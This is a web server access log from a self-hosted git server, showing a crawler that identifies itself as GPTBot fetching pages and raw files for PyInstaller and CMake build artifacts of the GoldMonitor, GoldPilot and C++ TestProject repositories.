"/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:14:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 33397] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:14:59:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" -[17/Feb/2026:14:59:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16920] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" -[17/Feb/2026:14:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:15:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 2815235] [Gzip 25.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:15:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11044] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:15:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14307] [Gzip 8.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73545] [Gzip 20.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9911] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21804] [Gzip 12.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9908] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9910] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:00:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:00:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23983] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9911] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:15:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 26768] [Gzip 20.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:15:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:15:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10753] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" -[17/Feb/2026:15:00:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:15:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16185] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" -[17/Feb/2026:15:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 10375] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:15:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 60204] [Gzip 16.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" -[17/Feb/2026:15:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 10376] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10779] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" -[17/Feb/2026:15:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 31774] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:15:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:15:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 10340] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:15:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:15:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10773] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" -[17/Feb/2026:15:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10947] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:15:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10948] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:15:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10950] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:15:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11828] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11164] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10951] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:15:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10949] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:15:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11273] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11195] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:00:26 +0000] - 200 200 